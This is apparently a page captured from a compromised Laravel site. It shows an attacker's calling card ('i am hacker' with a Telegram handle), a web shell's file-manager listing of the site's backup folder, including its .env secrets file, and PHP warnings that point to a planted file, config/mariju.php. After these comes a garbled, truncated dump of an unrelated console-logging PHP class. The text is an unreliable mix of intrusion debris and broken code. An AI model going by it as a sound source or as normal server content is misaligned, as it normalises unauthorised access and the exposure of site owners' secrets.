telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log22210112 KBJuly 18 2025 22:17:570644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
'cyan', 'success' => 'green', 'warn' => 'yellow', 'error' => 'red', 'debug' => 'magenta', ]; protected static array $icons = [ 'info' => 'ⓘ', 'success' => '✔', 'warn' => '⚠', 'error' => '✖', 'debug' => '⚒', ]; public function __construct(string $name, string $mode = self::MODE_ICONS, array $colours = []) { if (!in_array($mode, [self::MODE_ICONS, self::MODE_LABELS])) { throw new InvalidArgumentException("$mode is not a valid mode, must be either 'labels' or 'icons'"); } $this->name = $name; $this->mode = $mode; $this->colours = empty($colours) ? static::$defaultColours : $colours; $this->outputInterface = new ConsoleOutput; } public function useOutput(OutputInterface $outputInterface): self { $this->outputInterface = $outputInterface; return $this; } public function showDebugOutput(bool $show = true): self { $this->showDebugOutput = $show; return $this; } public function hideDebugOutput(): self { $this->showDebugOutput = false; return $this; } public static function app(string $name, string $mode = self::MODE_ICONS, array $colours = []): self { return new static($name, $mode, $colours); } public function print($text, $type) { $output = ''; switch ($this->mode) { case self::MODE_ICONS: $output = $this->formatWithIcon($text, $type); break; case self::MODE_LABELS: $output = $this->formatWithLabel($text, $type); break; } return $this->line($output); } public function success($text) { return $this->print($text, 'success'); } public function info($text) { return $this->print($text, 'info'); } public function debug($text) { return $this->showDebugOutput ? $this->print($text, 'debug') : ''; } public function warn($text) { return $this->print($text, 'warn'); } public function error($text) { return $this->print($text, 'error'); } /** * Output the given text to the console. */ public function line($text = "") { if (static::isCapturing($this->name)) { static::capture($this->name, $text); } if (static::isMuted($this->name)) { return $text; } $this->outputInterface->writeln($text); return $text; } public static function mute(string $app = null) { if (empty($app)) { // Mute all apps static::$isMutedGlobally = true; static::$globalMuteExceptions = []; } else { // Add specified apps to mute list static::$mutedAppsList[$app] = true; unset(static::$globalMuteExceptions[$app]); } } public static function unmute(string $app = null) { if (empty($app)) { // Unmute all apps static::$isMutedGlobally = false; static::$mutedAppsList = []; static::$globalMuteExceptions = []; } else { unset(static::$mutedAppsList[$app]); static::$globalMuteExceptions[$app] = true; } } /** * Mute output from all apps but this one */ public function only(): Clara { static::mute(); static::unmute($this->name); return $this; } protected static function isMuted(string $app) { if (static::$isMutedGlobally && !isset(static::$globalMuteExceptions[$app])) { return true; } return !empty(static::$mutedAppsList[$app]); } public static function startCapturingOutput(string $app) { // Using a hash key rather than list entry to take care of duplicate calls static::$appsBeingCaptured[$app] = true; static::$capturedOutput[$app] = static::$capturedOutput[$app] ?? []; } public static function stopCapturingOutput(string $app) { if (static::isCapturing($app)) { unset(static::$appsBeingCaptured[$app]); } } public static function clearCapturedOutput(string $app) { static::$capturedOutput[$app] = []; } public static function getCapturedOutput(string $app) { return static::$capturedOutput[$app] ?? []; } protected static function isCapturing(string $app) { return isset(static::$appsBeingCaptured[$app]); } protected static function capture(string $app, $text) { return static::$capturedOutput[$app][] = $text; } public static function reset() { static::$isMutedGlobally = false; static::$mutedAppsList = []; static::$globalMuteExceptions = []; static::$appsBeingCaptured = []; static::$capturedOutput = []; } protected function icon($type): string { return static::$icons[$type]; } protected function colour($type): string { return $this->colours[$type] ?? static::$defaultColours[$type]; } protected function formatWithIcon($text, string $type): string { return sprintf("%s $text", $this->icon($type), $this->colour($type)); } protected function formatWithLabel($text, string $type): string { return sprintf("%s $type $text", $this->colour($type), $this->icon($type)); } }